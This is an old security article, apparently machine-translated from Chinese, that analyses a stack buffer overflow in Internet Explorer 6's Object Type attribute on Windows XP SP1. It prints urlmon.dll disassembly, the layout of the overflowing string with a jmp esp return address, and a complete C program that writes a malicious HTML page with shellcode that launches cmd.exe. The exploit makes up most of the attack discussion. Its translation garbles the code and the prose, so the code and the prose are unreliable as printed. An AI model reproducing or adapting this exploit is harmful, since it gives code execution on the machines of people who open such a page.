[Practice] thoughts on Internet Explorer Object Type property Overflow

Thoughts on Internet Explorer Object Type property Overflow

Created on:
Article attributes: original
Article submitted: nanika (minjack.tw _ at_yahoo.com.tw)

Thoughts on Internet Explorer Object Type property Overflow

Nanika@seed.net.tw or minjack.tw@yahoo.com.tw

Test System: Windows xp_sp1 traditional Chinese Professional Edition

Iexplorer 6.00.2800.1106 (xpsp1.020828-1920)

Urlmon. dll 6.00.2800.1170

Msvcrt. dll 7.0.2600.1106 (xpsp1.020828-1920)

Shlwapi. dll 6.00.2800.1106 (xpsp1.020828-1920)

I will provide some technical details I have studied for your reference, so that you can discuss the research and write more general usage methods.

Simple exploit:
Construct the following data to store it as a webpage File
<Object type = "/////////////////////////////////// //// // bbbbaaaadddd "> CCCC </Object>
Use IE to open the constructed web page

RET 44444444 can change the program process

It looks like a traditional Stack Overflow
But one thing is similar to FSO.
[64 */] [BBBB] [AAAA] [dddd] [Any address (EDI)]
Aaaa is an EBP value.
Dddd is the EIP value.
However, the subsequent data is not an ESP value.
Yesedi Value
Carefully construct a piece of material for Object Type
You can write this data section
Any address

However, there cannot be 00 in [any address]. If there is 00, the data of each Member will be taken down to any address, so that the value of any address has a certain range, cannot be controlled at will

In addition, the location is quite difficult. After [any address], you can only add 40 bytes of data to put shellcode.

This indicates that RET uses jmp esp.

For reference
Eeye Digital Security uses JMP edX or call edX
Then there are some problems in locating shellcode to the program.

Further details

Key functions of Buffer Overflow

In urlmon. dll

. Text: 1a441cf6 sub_1a441cf6 proc near; Code xref:. Text: 1a42590ep
. Text: 1a441cf6
. Text: 1a441cf6 var_104 = byte PTR-104 H
. Text: 1a441cf6 arg_0 = dword ptr 8
. Text: 1a441cf6 arg_4 = dword ptr 0ch
. Text: 1a441cf6 arg_8 = dword ptr 10 h
. Text: 1a441cf6
. Text: 1a441cf6 push EBP
. Text: 1a441cf7 mov EBP, ESP
. Text: 1a441cf9 sub ESP, 104 H
. Text: 1a441cff mov ECx, [EBP + arg_8]
. Text: 1a441d02 push ESI
. Text: 1a441d03 mov ESI, ECx
. Text: 1a441d05 mov Cl, [ECx]
. Text: 1a441d07 test Cl, Cl
. Text: 1a441d09 Lea eax, [EBP + var_104]
. Text: 1a441d0f mov [EBP + var_104], Cl
. Text: 1a441d15 JZ short loc_1a441d35
. Text: 1a441d17
. Text: 1a441d17 loc_1a441d17:; Code xref: sub_1a441cf6 + 3dj
. Text: 1a441d17 CMP Cl, 2fh
. Text: 1a441d1a jnz short loc_1a441d2b
. Text: 1a441d1c mov byte PTR [eax], 5fh; unfold/(2f) into _ 2f _
. Text: 1a441d1f Inc eax
. Text: 1a441d20 mov byte PTR [eax], 32 h
. Text: 1a441d23 Inc eax
. Text: 1a441d24 mov byte PTR [eax], 46 h
. Text: 1a441d27 Inc eax
. Text: 1a441d28 mov byte PTR [eax], 5fh
. Text: 1a441d2b
. Text: 1a441d2b loc_1a441d2b:; Code xref: sub_1a441cf6 + 24j
. Text: 1a441d2b Inc ESI
. Text: 1a441d2c mov Cl, [esi]
. Text: 1a441d2e Inc eax
. Text: 1a441d2f test Cl, Cl
. Text: 1a441d31 mov [eax], Cl; buffer overflow is generated when copying strings.
. Text: 1a441d33 jnz short loc_1a441d17
. Text: 1a441d35
. Text: 1a441d35 loc_1a441d35:; Code xref: sub_1a441cf6 + 1fj
. Text: 1a441d35 Lea eax, [EBP + var_104]
. Text: 1a441d3b push eax
. Text: 1a441d3c mov eax, [EBP + arg_4]
. Text: 1a441d3f push offset dword_1a441d5c
. Text: 1a441d44 dec eax
. Text: 1a441d45 push eax
. Text: 1a441d46 push [EBP + arg_0]
. Text: 1a441d49 call DS: wnsprintfa
. Text: 1a441d4f add ESP, 10 h
. Text: 1a441d52 XOR eax, eax
. Text: 1a441d54 pop ESI
. Text: 1a441d55 leave
. Text: 1a441d56 retn 0ch; return to the location of dddd
. Text: 1a441d56 sub_1a441cf6 endp

If you want to use jmp esp to exploit this vulnerability and construct such strings

<Object type = "[/* 64] [BBBB] [AAAA] [jmpesp] [0x30800101] [A * 8] [shellcode40bytes]"> CCCC </Object>

Aaaa is the covered EBP value and must conform to the wide character encoding.

The EIP value covered by jmpesp can be placed in Ntdll. The jmp esp address 77fb59cc must comply with the width character encoding.

0x30800101 is a location that can be written without 00. It is used to bypass call DS: wnsprintfa and must conform to the wide character encoding.

A * 8 is not used here. You can enter it at will to conform to the wide character encoding.

Shellcode must note that to conform to the wide character encoding, the systems are not necessarily the same, and only 40 bytes
Optimize programs as much as possible

After discussing the exploitation method with eyas
You can also use this shellcode address to put a realshellcode "looking for" real malware, then place the realshellcode of the malicious program in <realshellcode> <object type = "[/* 64] [BBBB] [AAAA] [jmpesp] [0x30800101] [A * 8] [shellcode40bytes] "> CCCC </Object>, or elsewhere, as long as it can be found in the memory.

I used a simple method, wrote a shellcode that conforms to the Traditional Chinese version, and switched to shellcode using JMP ESP.

Exploit:

# Include <direct. h>

# Include <stdio. h>

# Include <windows. h>

# Include <sys/STAT. h>

# Include <winnls. h>

# Include <LM. h>

Unsigned char shellcode [27] =

"/X68/x63/x6d/x64/x20" // push cmd

"/X8b/xc4" // mov eax, ESP

"/X50" // push eax

"/Xb8/x44/X80/xbf/x77" // mov eax, system_fun_addr

"/XFF/xd0" // call eax

"/X41/x41" // Inc ECx = NOP

"/Xb8/XFD/x98/xe5/x77" // mov eax, exitprocess_fun_addr

"/XFF/xd0" // call eax

"/X41/x41"; // Inc ECx = NOP

Unsigned char eipaddr [5] =

"/Xcc/x59/xfb/x77"; // jmp esp ntdll. dll ADDR 77fb59cc pass widechar

Unsigned char pad [5] =

"/X30/X80/x10/x01 ";

Unsigned char Buf [65] = "";

Int J = 0;

Int I = 0;

Void main ()

{

Unsigned char temp;

Unsigned char change;

Char path [256];

File * BOF;

Struct stat st;

Printf ("/n/tbuffer overflow in Internet Explorer Object Type property overflow/n/tbig5 Unicode exploit by nanika/n/ttest windowsxp_sp1 big5 Ver/n/temail: minjack.tw@yahoo.com.tw or Nanika@seed.net.tw/N ");

Strcpy (path, "// assumer_exp_nanika ");

Mkdir (PATH );

Setfileattributes (path, file_attribute_readonly );

Strcat (path, "// exploit_ie_overflow.htm ");

If (STAT (path, & St) = 0)

{Remove (PATH); exit (1);} // just execute this program twice to remote this file

Bof = fopen (path, "W ");

Fputs ("<object type =/" ", BOF );

For (I = 0; I <sizeof (BUF );)

{

Buf [I ++] = 0x2f;

}

Buf [sizeof (BUF)-1] = 0;

Fprintf (Bof, "% s", Buf); // buff

Fputs ("aaaa", BOF); // pad

Fputs ("aaaa", BOF); // EBP

Fprintf (Bof, "% s", eipaddr); // RET --> jmp esp [NTDLL]

Fprintf (Bof, "% s", pad); // EDI

Fputs ("aaaaaaaa", BOF); // pad

Fprintf (Bof, "% s", shellcode); // shellcode

Fputs ("/"> CCCC </Object> ", BOF );

Fclose (BOF );

Printf ("/nexploit file: % s created./NIF success open exploit_ie_overflow.htm exec cmd.exe/ntry EXE again will kill exploit file/N", PATH );

}

Besides the preceding two methods, you can also consider using call DS: wnsprintfa, because a piece of data can be written to any address, however, you must accurately locate the writable address and conform to the wide character encoding.

Other vulnerability exploitation methods may require expert research.

I hope you have read this article for some gains.

Thank you for reading thanks.